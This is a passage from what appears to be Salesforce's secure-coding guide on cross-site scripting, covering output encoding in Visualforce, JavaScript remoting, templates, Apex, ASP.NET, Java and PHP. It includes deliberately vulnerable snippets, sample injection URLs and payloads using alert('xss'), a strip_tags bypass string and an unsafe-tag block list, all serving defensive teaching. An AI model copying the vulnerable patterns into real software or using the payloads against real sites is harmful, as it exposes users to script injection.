data.innerHTML = JSON.stringify(message.data.sobject.xyz__c);
document.querySelector('#content').appendChild(data);
});
Here, if xyz__c is built from one of the dangerous sObject types such as text, passing it to an HTML rendering function creates a vulnerability. In this case, the developer has two options:
- Use a safe DOM manipulation function such as innerText, rather than innerHTML.
- Properly encode the data in javascript prior to the innerHTML write
The first option is preferred, but may sometimes be impractical (for example, when you are using a higher-level toolkit that performs innerHTML writes in the method you are using). In that case you must use a JavaScript encoding library.
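The two options can be sketched as follows. The helper names appendAsText, appendAsHtml, and htmlEncode are hypothetical, and the small encoder stands in for a maintained encoding library. The sketch uses textContent, which, like innerText, writes text without invoking the HTML parser.

```javascript
// Minimal HTML encoder for text nodes and quoted attribute values (illustrative only).
function htmlEncode(value) {
  return String(value).replace(/[&<>"'`]/g, function (ch) {
    return '&#' + ch.charCodeAt(0) + ';';
  });
}

// Option 1 (preferred): a safe DOM property, so no HTML parsing takes place.
function appendAsText(doc, container, value) {
  const item = doc.createElement('li');
  item.textContent = value;
  container.appendChild(item);
}

// Option 2: encode for the HTML context before the innerHTML write.
function appendAsHtml(doc, container, value) {
  const item = doc.createElement('li');
  item.innerHTML = htmlEncode(value);
  container.appendChild(item);
}
```

In a page, both helpers would be called with document and the target element, for example appendAsText(document, document.querySelector('#content'), message.data.sobject.xyz__c).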
Javascript Security Encoding Libraries
Although Salesforce does not currently export javascript security encoding methods, there are a number of third party security libraries that you can use.
<apex:page controller="Xyz">
<apex:includeScript value="{!$Resource.SecureFilters}"/>
<div id="result">result</div>
<script type="text/javascript">
//basic encoding functions
var html_encode = secureFilters.html;
var js_encode = secureFilters.js;
var uri_encode = secureFilters.uri;
var css_encode = secureFilters.css;
//
//convenience methods
//
// applies HTMLENCODE(CSS ENCODE)
var style_encode = secureFilters.style;
// applies HTMLENCODE(JS ENCODE) for use in js event handlers
// defined in HTML rendering.
var js_attr_encode = secureFilters.jsAttr;
// secure version of JSON.stringify
var obj_encode = secureFilters.jsObj;
//Example usage
Visualforce.remoting.Manager.invokeAction(
'{!$RemoteAction.Xyz.getName}',
function(result, event){
if (event.status) {
//requires html encoding
$("#xyz").append(html_encode(result));
$("#xyz").append(
//requires html(js(encoding))
"<div id='abc' onclick='console.log(\"" +
js_attr_encode(result) + "\");'>Click me</div>"
);
document.querySelector("#abc").onmouseover = function() {
//do not encode here
console.log('You moused over ' + result);
};
} else if (event.type === 'exception') {
$("#responseErrors").html(
//'pre' is not safe because the message can contain
// a closing '</pre>' tag
html_encode(event.message) + "<br/>\n<pre>" + html_encode(event.where) + "</pre>"
);
} else {
//don't forget to encode messages in error conditions!
$("#responseErrors").html(
html_encode(event.message)
);
}
},
{escape: false}
);
</script>
</apex:page>
Notice that when generating the logs, the sample code applies html(js(result)) encoding in one case, while in the other no encoding is needed, even though both pieces of code do the same thing: create an event handler that logs a user-controlled string to the console.
This is because in the first case, user data is serialized into a string that is passed to the HTML parser. That string contains an attribute value definition (itself a serialized string) that is in turn passed to the JS parser. Therefore two layers of encoding are needed.
In the second case, the event handler is defined directly in JavaScript as a function and assigned to a DOM property. Because no string serialization or deserialization occurs, no client-side encoding is required.
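The layering can be made concrete with a small sketch. All names here (jsEncode, htmlEncode, jsAttrEncode, decodeCharRefs) are hypothetical and the encoders are deliberately minimal. decodeCharRefs only imitates the character reference substitution that the HTML parser applies to an attribute value before the JS parser sees it.

```javascript
// Minimal JS string-literal encoder: backslash-escapes quotes, backslashes and line breaks.
const JS_ESCAPES = { '\\': '\\\\', "'": "\\'", '"': '\\"', '\n': '\\n', '\r': '\\r',
                     '\u2028': '\\u2028', '\u2029': '\\u2029' };
function jsEncode(value) {
  return String(value).replace(/[\\'"\n\r\u2028\u2029]/g, function (ch) { return JS_ESCAPES[ch]; });
}

// Minimal HTML encoder using numeric character references.
function htmlEncode(value) {
  return String(value).replace(/[&<>"'`]/g, function (ch) { return '&#' + ch.charCodeAt(0) + ';'; });
}

// Encode for the innermost parser first (JS), then for the outer one (HTML).
function jsAttrEncode(value) {
  return htmlEncode(jsEncode(value));
}

// Imitates the HTML parser step: numeric character references become characters again.
function decodeCharRefs(attrValue) {
  return attrValue.replace(/&#(\d+);/g, function (match, code) {
    return String.fromCharCode(Number(code));
  });
}

const attack = "');alert(1);//";
// HTML encoding alone is undone by the HTML parser, so the quote reaches the JS parser intact.
const htmlOnly = decodeCharRefs(htmlEncode(attack));
// With both layers, the quote is still backslash-escaped when the JS parser sees it.
const layered = decodeCharRefs(jsAttrEncode(attack));
```

Here htmlOnly equals the original attack string, which would close the string literal inside the handler, while layered keeps the quote escaped, so the handler logs the user's text instead of executing it.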
Avoiding Serialization
<script>
var payload = '{!JSENCODE($CurrentPage.parameters.xyz)}';
//bad practice and vulnerable
$("#xyz").append("<div>" + payload + "</div>");
//safe and good practice
var div = document.createElement('div');
div.innerText = payload;
$("#xyz").append(div);
//bad practice and vulnerable
$("a#xyz").html("<a href=/" + payload + ">" + document.location.host + "/" + payload + "</a>");
//safe and good practice
$("a#xyz").attr("href", document.location.host + "/" + payload);
$("a#xyz").text(payload);
//bad practice and vulnerable
$("#xyz").append("<div id='abc' onclick='console.log(\"" + payload + "\");' >");
//safe and good practice
var el = document.createElement('div');
el.setAttribute('id', 'abc');
el.onclick = function() { console.log(payload); };
$("#xyz").append(el);
</script>
Built-in API encodings
Javascript remoting can be invoked with {escape: false} or (the default) {escape: true}. Enabling escaping means that the response is html encoded. In general developers should use {escape: true} when possible, but there are many cases where global html encoding at the transport layer is inappropriate.
- Encoding at the transport layer means that every field is html encoded, even if some fields (e.g. rich text fields) should not be encoded.
- In some cases, built in encoding is not available at the transport layer.
However, the advantage of html encoding at the transport layer is that if your page design is very simple (so that you only need html encoding), then you will not need to import a client side encoding library.
| API | Transport Layer Encoding Policy |
|---|---|
| SOAP API/REST API | never encodes |
| Streaming API | never encodes |
| Ajax Toolkit | never encodes |
| Javascript Remoting | HTML encodes unless invoked with an explicit {escape: false} |
| Visualforce Object Remoting | always HTML encodes |
<script>
var client = new forcetk.Client();
client.setSessionToken('{!$Api.Session_ID}');
client.query("SELECT Name FROM Account LIMIT 1", function(response){
$j('#accountname').html(response.records[0].Name); //vulnerable to XSS
});
</script>
Other taint sources
<apex:page>
<apex:includeScript value="{!$Resource.SecureFilters}"/>
<!-- safe, because of auto html-encoding -->
<h1 id="heading">{!$CurrentPage.parameters.heading}</h1>
<div id="section1"></div>
<div id="section2"></div>
<div id="section3"></div>
<script>
//safe because no HTML rendering occurs
document.querySelector('#section1').innerText =
document.querySelector('#heading').innerText;
//safe even though HTML rendering occurs because
//data is HTML encoded.
document.querySelector('#section2').innerHTML =
secureFilters.html(document.querySelector('#section1').innerText);
//vulnerable to XSS. HTML rendering is used and no encoding is performed.
document.querySelector('#section3').innerHTML =
document.querySelector('#section2').innerText;
</script>
</apex:page>
The DOM XSS Wiki contains a detailed list of sinks, sources and sample code.
Javascript Micro Templates
Developers wanting to move more presentational logic to the client often make use of javascript templating languages to handle html generation.
There are a large number of javascript micro-templating frameworks, roughly falling into two categories:
- logic-less frameworks such as mustache.js have their own domain-specific language (DSL) for iteration and logical operations.
- embedded JavaScript frameworks such as underscore.js’s _.template function use JavaScript to perform iteration and logical operations with client-side merge-fields, obviating the need to learn a DSL.
Nevertheless, none of the encoding or security concerns go away with these frameworks. Developers still need to be mindful of the type of data that is passed into the framework and of the ultimate context in which the data will be rendered, so that all variables are properly output encoded. In addition, they need to study the built-in encoding options offered by the framework. Generally all frameworks support some kind of HTML encoding, but the developer should verify that this includes escaping of single and double quotes for rendering within HTML attributes.
For rendering URLs, Javascript, or CSS, the developer is on their own and must either not render user-data in these contexts or use a third party security library to properly escape output in all contexts other than pure html.
One concern to keep in mind is that sometimes template data is stored in textarea tags with visibility set to hidden. In this case, be aware that HTML rendering occurs when data is sent to a textarea field.
Finally, never place merge-fields into template data, as templates are invoked with eval(). Rather, use merge-fields to define variables outside of your template and then pass the variable reference to the template.
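One way to verify that a framework's HTML encoder also covers quotes is to probe it with each character that must not survive unchanged. The helper below is a hypothetical sketch: findUnencoded is not part of any library, and encode stands for whatever escaping function the framework exposes (for instance _.escape in Underscore).

```javascript
// Characters that must be transformed for safe use in HTML text and quoted attributes.
const MUST_ENCODE = ['&', '<', '>', '"', "'"];

// Returns the characters that the given encoder passes through unchanged.
function findUnencoded(encode) {
  return MUST_ENCODE.filter(function (ch) {
    const probe = 'a' + ch + 'b';
    return encode(probe) === probe;
  });
}

// Example of an encoder that is adequate for element content but not for attributes.
function tagsOnlyEncode(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

const gaps = findUnencoded(tagsOnlyEncode); // the two quote characters
```

An encoder that leaves either quote character in the result should not be used to render data inside HTML attribute values.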
Underscore Templates
<apex:page >
<!-- vulnerable code -->
<apex:IncludeScript value="{!$Resource.jquery}"/>
<apex:IncludeScript value="{!$Resource.underscore}"/>
<apex:IncludeScript value="{!$Resource.Securefilters}"/>
<apex:includeScript value="{!URLFOR($Resource.forcetk)}"/>
<div id='mainContainer'>content</div>
<!-- vulnerable to XSS -->
<script type='template' id="template1">
<div onclick="console.log('<%- Name %>');"><%-Id%></div>
</script>
<!-- safe -->
<script type='template' id="template2">
<div onclick='console.log("<% print(jsencode(Name)) %>")'><%-Id%></div>
</script>
<!-- vulnerable to XSS -->
<script type='template' id="template3">
<div>Name: <%=Name%></div>
</script>
<!-- safe -->
<script type='template' id="template4">
<div>Name: <%-Name%></div>
</script>
<script>
var compiled1 = _.template($('#template1').html());
var compiled2 = _.template($('#template2').html());
var compiled3 = _.template($('#template3').html());
var compiled4 = _.template($('#template4').html());
var client = new forcetk.Client();
client.setSessionToken('{!$Api.Session_ID}');
var jsencode = secureFilters.js;
$(document).ready(function() {
//tell client to wait a bit here..
client.query("SELECT Name FROM Account LIMIT 1", function(record){
render(record.records[0].Name);
}
);
});
function render(name) {
var record = {
Id: "click me!",
Name: name //for 2: \x22); alert(1); //
};
$('#mainContainer').empty();
$('#mainContainer').append(compiled1(record)); //pops
$('#mainContainer').append(compiled2(record)); //does not pop
$('#mainContainer').append(compiled3(record)); //pops
$('#mainContainer').append(compiled4(record)); //does not pop
}
</script>
</apex:page>
ESAPI and Encoding within Apex
Encoding within the controller is strongly discouraged, as you should encode as close to the rendering context as possible. Whenever encoding occurs within a controller, a dependency is created between the View and the Controller, whereas the controller should be agnostic to how the data is rendered. Moreover, this pattern is not robust because the Visualforce page may want to render the same variable in several different contexts, but the controller can only encode in one.
Do not attempt to generate HTML code or javascript code in the controller.
String usertext = ApexPages.currentPage().getParameters().get('usertext');
// the next line encodes the usertext similar to the Visualforce HTMLENCODE function but within an Apex class.
usertext = ESAPI.encoder().SFDC_HTMLENCODE(usertext);
Do not use the built-in Apex String encoding functions: String.escapeEcmaScript(), String.escapeHtml3(), and String.escapeHtml4(). These functions are based on Apache's StringEscapeUtils package, which was not designed for security encoding and should not be used.
Dangerous Programming Constructs
The following mechanisms do not have built-in auto-HTML encoding protection and should in general be avoided whenever possible.
S-Controls and Custom JavaScript Sources
<apex:includeScript value="{!$CurrentPage.parameters.userInput}" />
S-Control Template and Formula Tags
S-Controls give the developer direct access to the HTML page itself and include an array of tags that can be used to insert data into the pages. S-Controls do not use any built-in XSS protections. When using the template and formula tags, all output is unfiltered and must be validated by the developer.
The general syntax of these tags is: {!FUNCTION()} or {!$OBJECT.ATTRIBUTE}.
<a
href="https://example.com/integration?sid={!$Api.Session_ID}&server={!$Api.Partner_Server_URL_130}">Go
to portal</a>
<a
href="http://partner.domain.com/integration?sid=4f0900D30&server=https://MyDomainName.my.salesforce.com/services/Soap/u/32.0/4f0900D30000000Jsbi">Go
to portal</a>
<html>
<head>
<title>{!$Request.title}</title>
</head>
<body>
Hello world!
</body>
</html>
https://example.com/demo/hello.html?title=Hola
<html>
<head>
<title>Hola</title>
</head>
<body>
Hello world!
</body>
</html>
https://example.com/demo/hello.html?title=Adios%3C%2Ftitle%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E
<html><head><title>Adios</title><script>alert('xss')</script></title></head><body>Hello
world!</body></html>
<html>
<head>
<title>
{!HTMLENCODE($Request.title)}
</title>
</head>
<body>
Hello world!
</body>
</html>
<script>var ret = "{!$Request.retURL}";</script>
https://example.com/demo/redirect.html?retURL=xyz%22%3Balert('xss')%3B%2F%2F
would result in
<script>var ret = "xyz";alert('xss');//";</script>
<script>
// Encode for URL
var ret = "{!URLENCODE($Request.retURL)}";
window.location.href = ret;
</script>
<script>
// Encode for JS variable that is later used in HTML operation
var title = "{!JSINHTMLENCODE($Request.title)}";
document.getElementById('titleHeader').innerHTML = title;
</script>
<script>
// Standard JSENCODE to embed in JS variable not later used in HTML
var pageNum = parseInt("{!JSENCODE($Request.PageNumber)}");
</script>
Formula tags can also be used to include platform object data. Although the data is taken directly from the user’s org, it must still be escaped before use to prevent users from executing code in the context of other users (potentially those with higher privilege levels). While these types of attacks would need to be performed by users within the same organization, they would undermine the organization’s user roles and reduce the integrity of auditing records. Additionally, many organizations contain data which has been imported from external sources, which may not have been screened for malicious content.
General Guidance for Other Platforms
This section briefly summarizes XSS best practices on other platforms.
Allowing HTML injection
If your application allows users to include HTML tags by design, you must exercise great caution in what tags are allowed. The following tags may allow injection of script code directly or via attribute values and should not be allowed. See HTML 5 Security Cheat Sheet for details.
Unsafe HTML Tags:
<applet> <body> <button> <embed> <form> <frame> <frameset> <html> <iframe> <image> <ilayer> <input> <layer> <link> <math> <meta> <object> <script> <style> <video>
Be aware that the above list cannot be exhaustive. Similarly, there is no complete list of JavaScript event handler names (although see this page on Quirksmode), so there can be no perfect list of bad HTML element attribute names.
Instead, it makes more sense to create a well-defined known-good subset of HTML elements and attributes. Using your programming language’s HTML or XML parsing library, create an HTML input handling routine that throws away all HTML elements and attributes not on the known-good list. This way, you can still allow a wide range of text formatting options without taking on unnecessary XSS risk. Creating such an input validator is usually around 100 lines of code in a language like Python or PHP; it might be more in Java but is still very tractable.
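The known-good approach can be sketched as a filter over an already parsed tree. This sketch assumes a real HTML parser has produced nodes of the hypothetical shape { tag, attrs, children }, with text as plain strings and attribute names in lower case. The ALLOWED list and the helper names are illustrative, not a vetted policy.

```javascript
// Hypothetical known-good list: element name -> permitted attribute names.
const ALLOWED = {
  b: [], i: [], em: [], strong: [], p: [], br: [], ul: [], ol: [], li: [],
  a: ['href', 'title']
};

// Only http(s) links are accepted, so javascript: URLs cannot slip through href.
function isSafeHref(value) {
  return /^https?:\/\//i.test(value);
}

// Returns a filtered copy of the node, or null if the element is not on the list.
function filterNode(node) {
  if (typeof node === 'string') return node; // text is kept; HTML-encode it on output
  const tag = String(node.tag).toLowerCase();
  if (!Object.prototype.hasOwnProperty.call(ALLOWED, tag)) return null; // drop whole subtree
  const attrs = {};
  for (const name of ALLOWED[tag]) {
    const value = (node.attrs || {})[name];
    if (typeof value !== 'string') continue;
    if (name === 'href' && !isSafeHref(value)) continue;
    attrs[name] = value;
  }
  const children = (node.children || [])
    .map(filterNode)
    .filter(function (child) { return child !== null; });
  return { tag: tag, attrs: attrs, children: children };
}
```

Because the filter copies only what is explicitly listed, unknown elements, event handler attributes, and new browser features are rejected by default. The filtered tree must still be serialized with proper HTML encoding of text and attribute values.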
HTTP Only Cookies
When possible, set the HttpOnly attribute on your cookies. This flag tells the browser to reveal the cookie only over HTTP or HTTPS connections, but to have document.cookie evaluate to a blank string when JavaScript code tries to read it. (Some browsers do still let JavaScript code overwrite or append to document.cookie, however.) If your application does require the ability for JavaScript to read the cookie, then you won’t be able to set HttpOnly. Otherwise, you might as well set this flag.
Note that HttpOnly is not a defense against XSS, it is only a way to briefly slow down attackers exploiting XSS with the simplest possible attack payloads. It is not a bug or vulnerability for the HttpOnly flag to be absent.
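As a small illustration, a Set-Cookie header value carrying the flag could be assembled as below. The function buildSetCookie and its options argument are hypothetical, and most server frameworks offer their own cookie API that should be preferred.

```javascript
// Builds a Set-Cookie header value; HttpOnly is on unless explicitly disabled.
function buildSetCookie(name, value, options) {
  const opts = options || {};
  const parts = [name + '=' + encodeURIComponent(value), 'Path=/'];
  if (opts.httpOnly !== false) {
    parts.push('HttpOnly'); // hides the cookie from document.cookie reads
  }
  return parts.join('; ');
}
```

Making HttpOnly the default means that a cookie is readable from JavaScript only when a caller deliberately passes { httpOnly: false }.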
Stored XSS Resulting from Arbitrary User Uploaded Content
Applications such as Content Management, Email Marketing, etc. may need to allow legitimate users to create and/or upload custom HTML, Javascript or files. This feature could be misused to launch XSS attacks. For instance, a lower privileged user could attack an administrator by creating a malicious HTML file that steals session cookies. The recommended protection is to serve such arbitrary content from a separate domain outside of the session cookie's scope.
Let’s say cookies are scoped to https://app.site.com. Even if customers can upload arbitrary content, you can always serve the content from an alternate domain that is outside of the scoping of any trusted cookies (session cookies and other sensitive information). As an example, pages on https://app.site.com would reference customer-uploaded HTML templates as IFRAMES using a link to https://content.site.com/cust1/templates?templId=13&auth=someRandomAuthenticationToken
The authentication token would substitute for the session cookie since sessions scoped to app.site.com would not be sent to content.site.com. If the data being stored is sensitive, a one time use or short lived token should be used. This is the method that Salesforce uses for our content product.
HTTP Response Splitting
HTTP response splitting is a vulnerability closely related to XSS, and for which the same defensive strategies apply. Response splitting occurs when user data is inserted into an HTTP header returned to the client. Instead of inserting malicious script, the attack is to insert additional newline characters. Because headers and the response body are delimited by newlines in HTTP, this allows the attacker to insert their own headers and even construct their own page body (which might have an XSS payload inside). To prevent HTTP response splitting, filter ‘\n’ and ‘\r’ from any output used in an HTTP header.
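The filtering step can be sketched as below. The function names stripNewlines and buildHeader are hypothetical, and the sketch assumes the header name is chosen by the developer while only the value may contain user data.

```javascript
// Removes carriage returns and line feeds so that a value cannot end the header line.
function stripNewlines(value) {
  return String(value).replace(/[\r\n]/g, '');
}

// Builds a single header line from a developer-chosen name and an untrusted value.
function buildHeader(name, value) {
  return name + ': ' + stripNewlines(value);
}
```

For example, a value of "/home" followed by CR LF and "Set-Cookie: sid=evil" collapses into one harmless header line instead of producing a second header.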
ASP.NET
ASP.NET provides several built-in mechanisms to help prevent XSS, and Microsoft supplies several free tools for identifying and preventing XSS in sites built with .NET technology.
An excellent general discussion of preventing XSS in ASP.NET 1.1 and 2.0 can be found at the Microsoft Patterns & Practices site: Howto Prevent XSS in ASP
By default, ASP.NET enables request validation on all pages, to prevent accepting input that contains unencoded HTML. (For more details see http://www.asp.net/learn/whitepapers/request-validation/.) Verify in your Machine.config and Web.config that you have not disabled request validation. Identify and correct any pages that may have disabled it individually by searching for the ValidateRequest attribute in the page declaration tag. If this attribute is not present, it defaults to true.
Input Validation
For server controls in ASP.NET, it is simple to add server-side input validation using <asp:RegularExpressionValidator>.
If you are not using server controls, you can use the Regex class in the System.Text.RegularExpressions namespace or use other supporting classes for validation.
For example regular expressions and tips on other validation routines for numbers, dates, and URL strings, see Microsoft Patterns & Practices: “How To: Protect from Injection Attacks in ASP.NET”.
Output Filtering & Encoding
The System.Web.HttpUtility class provides convenient methods, HtmlEncode and UrlEncode, for escaping output to pages. These methods are safe, but follow a “blocklist” approach that encodes only a few characters known to be dangerous. Microsoft also makes available the AntiXSS Library, which follows a more restrictive approach, encoding all characters not in an extensive, internationalized allowlist.
Tools and Testing
Microsoft provides a free static analysis tool, CAT.NET. CAT.NET is a snap-in to Visual Studio that helps identify XSS as well as several other classes of security flaw. Visual Studio has built-in static analysis features that can help identify security vulnerabilities: https://learn.microsoft.com/en-us/visualstudio/code-quality/overview-of-code-analysis-for-managed-code
Java
J2EE web applications have perhaps the greatest diversity of frameworks available for handling user input and creating pages. Several strong, all-purpose libraries are available, but it is important to understand what your particular platform provides.
Input Filtering
<plug-in className="org.apache.struts.validator.ValidatorPlugIn">
<set-property property="pathnames" value="/WEB-INF/validator-rules.xml"/>
</plug-in>
Or you can build programmatic validation directly into your form beans with regular expressions.
Learn more about Java regular expressions here: Java Regex Documentation.
The Spring Framework also provides utilities for building automatic validation into data binding. You can implement the org.springframework.validation.Validator interface with the help of Spring’s ValidationUtils class to protect your business objects. Get more information here: Spring Validation.
A more generic approach, applicable to any kind of Java object, is presented by the OVal object validation framework. OVal allows constraints on objects to be declared with annotations, through POJOs, or in XML, and custom constraints to be expressed as Java classes or in a variety of scripting languages. The system is quite powerful, implements Programming by Contract features using AspectJ, and provides some built-in support for frameworks like Spring. Learn more about OVal at: OVal
Output Filtering and Encoding
JSTL tags such as <c:out> have the escapeXml attribute set to true by default. This default behavior ensures that HTML special characters are entity-encoded and prevents many XSS attacks. If any tags in your application set escapeXml="false" (such as for outputting the Japanese yen symbol), you need to apply some other escaping strategy. For JSF, the tag attribute is escape, and it is also set to true by default for <h:outputText> and <h:outputFormat>.
Other page generation systems do not always escape output by default. Freemarker is one example. All application data included in a Freemarker template should be surrounded with an <#escape> directive to do output encoding (e.g. <#escape x as x?html>) or by manually adding ?html (or ?js_string for JavaScript contexts) to each expression (e.g. ${username?html}).
Custom JSP tags or direct inclusion of user data variables with JSP expressions (e.g. <%= request.getHeader("HTTP_REFERER") %>) or scriptlets (e.g. <% out.println(request.getHeader("HTTP_REFERER")); %>) should be avoided.
If you are using a custom page-generation system, one that does not provide output escaping mechanisms, or building directly with scriptlets, there are several output encoding libraries available. The OWASP Enterprise Security API for Java is a mature project that offers a variety of security services to J2EE applications. The org.owasp.esapi.codecs package provides classes for encoding output strings safely for HTML, JavaScript and several other contexts. Get it here: OWASP Enterprise Security API (ESAPI)
PHP
Input Filtering
As of PHP 5.2.0, data filtering is a part of the PHP Core. The package documentation is available at: PHP Data Filtering Library.
Two types of filters can be declared: sanitization filters that strip or encode certain characters, and validation filters that can apply business logic rules to inputs.
Output Encoding
PHP provides two built-in string functions for encoding HTML output. htmlspecialchars encodes only &, ", ', <, and > (the single quote only when the ENT_QUOTES flag is set, which is the default as of PHP 8.1), while htmlentities encodes all characters that have defined HTML entities.
For bulletin-board like functionality where HTML content is intended to be included in output, the strip_tags function is also available to return a string with all HTML and PHP tags removed, but because this function is implemented with a regex that does not validate that incoming strings are well-formed HTML, partial or broken tags may be able to bypass the system. For example, the string <<b>script>alert('xss');<</b>/script> might have the <b> and </b> tags removed, leaving the vulnerable string <script>alert('xss');</script>. If you are going to rely on this function, input must be sent to an HTML validating and tidying program first. (Note that in PHP 5.2.6, strip_tags does appear to work, reducing the aforementioned attack string to alert('xss'). Does it work in your version?)